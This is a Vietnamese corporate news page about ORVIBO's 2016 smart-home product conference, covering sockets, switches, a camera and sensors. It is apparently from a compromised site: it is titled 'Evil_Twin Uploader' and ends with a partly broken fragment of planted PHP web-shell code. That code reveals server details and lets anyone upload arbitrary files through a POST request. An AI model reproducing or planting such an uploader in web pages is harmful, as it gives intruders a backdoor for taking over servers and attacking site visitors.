Evil_Twin Uploader

SỰ KIỆN ORVIBO 2016: Hội thảo về các sản phẩm mới

   

   Xin chúc mừng cho sự thành công của hội nghị lớn nhất của ORVIBO trong năm nay! Chúng tôi đánh giá cao tất cả những ai đã tham dự hội nghị này và đã giao tiếp tốt với nhau.

 

   Tại hội nghị này, chúng tôi đã gặp gỡ gần một nghìn khách hàng và đối tác của ORVIBO, đã nói về công nghệ và xu hướng nhà thông minh, giới thiệu loạt sản phẩm mới ORVIBO và chia sẻ kinh nghiệm thành công của nhiều dự án bao gồm nhà thông minh, khách sạn thông minh, văn phòng thông minh và thông minh cộng đồng.  

   

    ORVIBO là một công ty nhà thông minh hàng đầu với một đội ngũ R & D mạnh mẽ, nhấn mạnh vào thiết kế ban đầu và có một phong cách nổi bật. Các sản phẩm từ ORVIBO đã giành được nhiều giải thưởng thiết kế sản phẩm quốc tế như Giải thưởng THIẾT KẾ VÀNG VÀNG, Giải thưởng THIẾT KẾ NĂM 2016, DOOD DESIGH AWARD 2016.

    Tại hội thảo này, Mark Wong, Giám đốc điều hành của ORVIBO, đã thuyết trình về các sản phẩm mới của ORVIBO, những sản phẩm này không chỉ tiên tiến trong công nghệ thông minh mà còn ấn tượng trong thiết kế.

 

S30 Smart Wifi Socket- Màu sắc hấp dẫn của macarons

    Màu sắc ngọt ngào, thiết kế thanh lịch, làm cho ổ cắm thông minh S30 trở nên phù hợp hơn với các loại phong cách trang trí nội thất. Trong khi bạn tận hưởng chức năng của nó như điều khiển từ xa, phát hiện điện, bạn cũng tìm thấy chúng cần thiết trong nhà của bạn.

Ổ cắm thông minh S31 – Ổ cắm khối đặc biệt

    Kích thước nhỏ và tiết kiệm không gian, một ổ cắm phù hợp với các loại phong cách trang trí nhà, tạo ra một sự khác biệt nhỏ và trông tuyệt vời.

 

New Coming Smart Switch Series – thiết kế tinh tế cho thấy tâm trí sáng tạo và cảm hứng từ các kỹ sư và nhà thiết kế của ORVIBO

 

Module truyền thông thông minh

 

Robot thông minh với tương tác bằng giọng nói

 

Camera IP thông minh – Báo thức video và lưu trữ đám mây, kiểm tra bản ghi bất cứ lúc nào bạn muốn.

 

Cảm biến ORVIBO series– Cảm biến  carbon monoxide / cảm biến khói / cảm biến khí dễ cháy / cảm biến rò rỉ nước

    Cảm biến Carbon monoxide và Formaldehyde –  Giám sát chất lượng không khí trong nhà của bạn, thông báo cho điện thoại thông minh của bạn. Sức khỏe của bạn, ORVIBO quan tâm.

    Người sáng lập ORVIBO, CEO Mark Wong nói: “ORVIBO là một công ty công nghệ nhà thông minh, nhưng chúng tôi phải làm nổi bật thiết kế sản phẩm trong sự phát triển của chúng tôi.” Mọi người luôn nghĩ nhà thông minh chỉ kết nối mọi thứ với mạng, nhưng ORVIBO không đồng ý, vẫn còn nhiều tiềm năng trong ngành công nghiệp nhà thông minh, ORVIBO sẽ tiếp tục làm việc chăm chỉ và phát triển các hệ thống và hệ thống thông minh xuất sắc hơn trong tương lai.

 

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial